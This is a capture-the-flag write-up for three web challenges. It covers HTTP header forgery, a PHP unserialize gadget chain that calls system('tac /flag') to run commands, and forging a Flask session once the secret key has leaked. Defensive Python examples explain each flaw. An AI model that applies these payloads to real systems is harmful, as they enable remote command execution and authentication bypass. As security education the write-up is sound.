EzHttp

POST / HTTP/1.1
Host: 1.117.175.65:23333
O2TAKUXX: GiveMeFlag
Content-Length: 44
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Syclover
X-Forwarded-For: 127.0.0.1
Via: Syc.vip
Origin: http://1.117.175.65:23333
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: sycsec.com
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

username=admin&password=%40dm1N123456r00t%23

All the commonly used request-header forgeries are in this one request: X-Forwarded-For, Via, Referer, Origin and User-Agent are all set to whatever the server's checks expect.
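The reason these headers are all forgeable is that every one of them is written by the sender. As an added example (not part of the original writeup), the Python below parses a constructed copy of the request above and shows the only defensible way to decide the client address: trust X-Forwarded-For hops only when they were appended by a proxy you operate, and otherwise use the TCP peer. The trusted-proxy list and the peer addresses are assumptions for the demonstration.

```python
from typing import Dict, List, Tuple

# Constructed sample input: a subset of the request shown above.
RAW_REQUEST = (
    "POST / HTTP/1.1\r\n"
    "Host: 1.117.175.65:23333\r\n"
    "X-Forwarded-For: 127.0.0.1\r\n"
    "Via: Syc.vip\r\n"
    "Referer: sycsec.com\r\n"
    "User-Agent: Syclover\r\n"
    "Connection: close\r\n"
    "\r\n"
    "username=admin&password=%40dm1N123456r00t%23"
)


def parse_request(raw: str) -> Tuple[str, Dict[str, str], str]:
    """Split a raw HTTP/1.1 request into request line, lower-cased header map and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def client_ip(peer_addr: str, headers: Dict[str, str], trusted_proxies: List[str]) -> str:
    """Return the address the application may treat as the client's.

    Each proxy appends the peer it saw to X-Forwarded-For, but the leftmost
    entries are whatever the original sender wrote. Walk the chain from the
    right (the TCP peer is the rightmost, implicit hop), skip the proxies we
    operate, and stop at the first hop we did not add ourselves.
    """
    chain = [h.strip() for h in headers.get("x-forwarded-for", "").split(",") if h.strip()]
    chain.append(peer_addr)
    for hop in reversed(chain):
        if hop not in trusted_proxies:
            return hop
    return peer_addr  # every hop was one of our own proxies; fall back to the peer


def is_loopback_client(peer_addr: str, headers: Dict[str, str], trusted_proxies: List[str]) -> bool:
    """The check a server should use instead of comparing X-Forwarded-For directly."""
    return client_ip(peer_addr, headers, trusted_proxies) == "127.0.0.1"


if __name__ == "__main__":
    _, hdrs, _ = parse_request(RAW_REQUEST)
    # Direct connection from an assumed external peer: the forged 127.0.0.1 is ignored.
    print(client_ip("203.0.113.5", hdrs, []))
    print(is_loopback_client("203.0.113.5", hdrs, []))
```

With no trusted proxies configured the forged header is never consulted; with a proxy at an assumed 10.0.0.1 that appends the real peer, the chain `127.0.0.1, 203.0.113.5` still resolves to 203.0.113.5, because the walk stops at the first hop the proxy added rather than the one the sender wrote.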

unsign

<?php

highlight_file(__FILE__);

// The three classes from the challenge source. syc -> lover -> web is the chain;
// web's two properties end up as the function name and its argument.
class syc
{
    public $cuit;
}

class lover
{
    public $yxx;
    public $QW;
}

class web
{
    public $eva1;
    public $interesting;
}

$a = new syc();
$b = new lover();
$c = new web();

// Link the objects so that unserializing $a rebuilds the whole chain.
$a->cuit = $b;
$b->yxx = $c;
$c->eva1 = "system";
$c->interesting = "tac /flag";

// URL-encode the serialized object so it can be sent as a request parameter.
print(urlencode(serialize($a)));

?>
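The chain works because unserialize() instantiates whatever class names appear in the string. The fix on the PHP side is to never unserialize user input, or at least to pass `['allowed_classes' => false]` (or an explicit list) as the second argument. As an added example that is not part of the writeup, the Python below parses PHP's serialization format and lists every class a parameter would instantiate, which is how a request filter or log check can spot nested object chains like the one above. The sample input is constructed by hand in the shape the script above prints; Python is used so the example runs alongside the others on this page.

```python
from dataclasses import dataclass, field
from typing import Any, Dict, List, Optional, Tuple
from urllib.parse import quote, unquote_to_bytes


@dataclass
class PhpObject:
    cls: str
    props: Dict[Any, Any] = field(default_factory=dict)


def parse_php(data: bytes, pos: int = 0) -> Tuple[Any, int]:
    """Parse one PHP-serialized value starting at pos; return (value, next position)."""
    tag = data[pos:pos + 1]
    if tag == b"N":                                   # N;
        return None, pos + 2
    if tag in (b"b", b"i", b"d"):                     # b:1;  i:42;  d:1.5;
        end = data.index(b";", pos)
        raw = data[pos + 2:end]
        value = (raw == b"1") if tag == b"b" else int(raw) if tag == b"i" else float(raw)
        return value, end + 1
    if tag == b"s":                                   # s:5:"hello";  (length-prefixed, may contain anything)
        colon = data.index(b":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2
        if data[start + length:start + length + 2] != b'";':
            raise ValueError("bad string length at offset %d" % pos)
        return data[start:start + length].decode("latin-1"), start + length + 2
    if tag == b"a":                                   # a:2:{key;value;...}
        colon = data.index(b":", pos + 2)
        count = int(data[pos + 2:colon])
        pos = colon + 2
        items: Dict[Any, Any] = {}
        for _ in range(count):
            key, pos = parse_php(data, pos)
            items[key], pos = parse_php(data, pos)
        return items, pos + 1                         # skip the closing brace
    if tag == b"O":                                   # O:3:"syc":1:{s:4:"cuit";...}
        colon = data.index(b":", pos + 2)
        name_len = int(data[pos + 2:colon])
        name = data[colon + 2:colon + 2 + name_len].decode("latin-1")
        pos = colon + 2 + name_len + 2                # skip the closing quote and colon
        colon = data.index(b":", pos)
        count = int(data[pos:colon])
        pos = colon + 2
        obj = PhpObject(name)
        for _ in range(count):
            key, pos = parse_php(data, pos)
            obj.props[key], pos = parse_php(data, pos)
        return obj, pos + 1
    raise ValueError("unsupported tag %r at offset %d" % (tag, pos))


def classes_referenced(value: Any, found: Optional[List[str]] = None) -> List[str]:
    """Collect class names in instantiation order, descending into nested objects and arrays."""
    found = [] if found is None else found
    if isinstance(value, PhpObject):
        found.append(value.cls)
        for v in value.props.values():
            classes_referenced(v, found)
    elif isinstance(value, dict):
        for v in value.values():
            classes_referenced(v, found)
    return found


def unexpected_classes(param: str, allowed: Tuple[str, ...] = ()) -> List[str]:
    """URL-decode a request parameter and list every class it would instantiate
    that is not on the allowlist. A non-empty result is worth blocking or alerting on."""
    value, _ = parse_php(unquote_to_bytes(param))
    return [c for c in classes_referenced(value) if c not in allowed]


# Constructed sample in the shape the PHP script above prints (before urlencode).
SAMPLE = ('O:3:"syc":1:{s:4:"cuit";O:5:"lover":2:{s:3:"yxx";O:3:"web":2:'
          '{s:4:"eva1";s:6:"system";s:11:"interesting";s:9:"tac /flag";}s:2:"QW";N;}}')

if __name__ == "__main__":
    print(unexpected_classes(quote(SAMPLE)))          # ['syc', 'lover', 'web']
    print(unexpected_classes(quote('a:1:{i:0;s:1:"x";}')))   # [] : plain arrays carry no classes
```

Strings are decoded as latin-1 on purpose: PHP's length prefix counts bytes, and protected or private property names contain NUL bytes, so a byte-faithful decode keeps the offsets right for any input.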

you know flask?

Got hold of the Flask session; decoding it showed a field that marks whether the user is admin. Flask sessions are signed with a secret key, which means decoding is easy but forging is hard: to forge one you have to find the key. The key turned out to be in /robots.txt, and the forged session worked.
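The "easy to decode, hard to forge" property comes from the cookie being signed rather than encrypted. As an added example (not part of the writeup, and not Flask's or itsdangerous's own code), the Python below re-implements the cookie format Flask uses for plain JSON session values with the standard library only: salt `cookie-session`, HMAC-SHA1 key derivation, an optional zlib-compressed payload marked by a leading dot, a timestamp, and an HMAC-SHA1 signature. `decode_session` needs no key at all, while `verify_session` is what the server runs on every request and is the only thing standing between a reader and a writer of the cookie. The secret key and session values are constructed for the demonstration.

```python
import base64
import hashlib
import hmac
import json
import time
import zlib
from typing import Optional

SALT = b"cookie-session"   # the salt Flask's session interface passes to itsdangerous


def _b64e(data: bytes) -> bytes:
    return base64.urlsafe_b64encode(data).rstrip(b"=")


def _b64d(data: bytes) -> bytes:
    return base64.urlsafe_b64decode(data + b"=" * (-len(data) % 4))


def decode_session(cookie: str) -> dict:
    """Read the payload. No key is involved: the cookie is signed, not encrypted."""
    payload = cookie.rsplit(".", 2)[0]
    compressed = payload.startswith(".")      # leading dot marks a zlib-compressed payload
    raw = _b64d(payload[1:].encode() if compressed else payload.encode())
    if compressed:
        raw = zlib.decompress(raw)
    return json.loads(raw)


def _signing_key(secret_key: str) -> bytes:
    # itsdangerous "hmac" key derivation: HMAC-SHA1(secret, salt)
    return hmac.new(secret_key.encode(), SALT, hashlib.sha1).digest()


def sign_session(data: dict, secret_key: str, timestamp: Optional[int] = None) -> str:
    """Build a cookie the way Flask does for this dict and SECRET_KEY."""
    raw = json.dumps(data, separators=(",", ":"), sort_keys=True).encode()
    packed = zlib.compress(raw)
    payload = b"." + _b64e(packed) if len(packed) < len(raw) - 1 else _b64e(raw)
    ts = int(time.time()) if timestamp is None else timestamp
    signed = payload + b"." + _b64e(ts.to_bytes((ts.bit_length() + 7) // 8, "big"))
    sig = hmac.new(_signing_key(secret_key), signed, hashlib.sha1).digest()
    return (signed + b"." + _b64e(sig)).decode()


def verify_session(cookie: str, secret_key: str) -> Optional[dict]:
    """Server-side check: recompute the MAC and reject anything that does not match."""
    try:
        signed, sig = cookie.rsplit(".", 1)
        expected = hmac.new(_signing_key(secret_key), signed.encode(), hashlib.sha1).digest()
        if not hmac.compare_digest(_b64e(expected), sig.encode()):
            return None
        return decode_session(cookie)
    except (ValueError, zlib.error):
        return None


if __name__ == "__main__":
    SECRET = "constructed-demo-secret"   # constructed; the real key must never be served, robots.txt included
    cookie = sign_session({"username": "guest", "is_admin": False}, SECRET)
    print(decode_session(cookie))        # anyone holding the cookie can read is_admin
    guessed = sign_session({"username": "guest", "is_admin": True}, "wrong-guess")
    print(verify_session(guessed, SECRET))   # None: signed with the wrong key, so rejected
```

The design point is that everything in the cookie is attacker-readable by construction, so nothing secret belongs in it, and the whole scheme collapses to "who knows SECRET_KEY": a key that is short, guessable, committed to a repo or, as here, published under the web root gives every visitor the same power as the server.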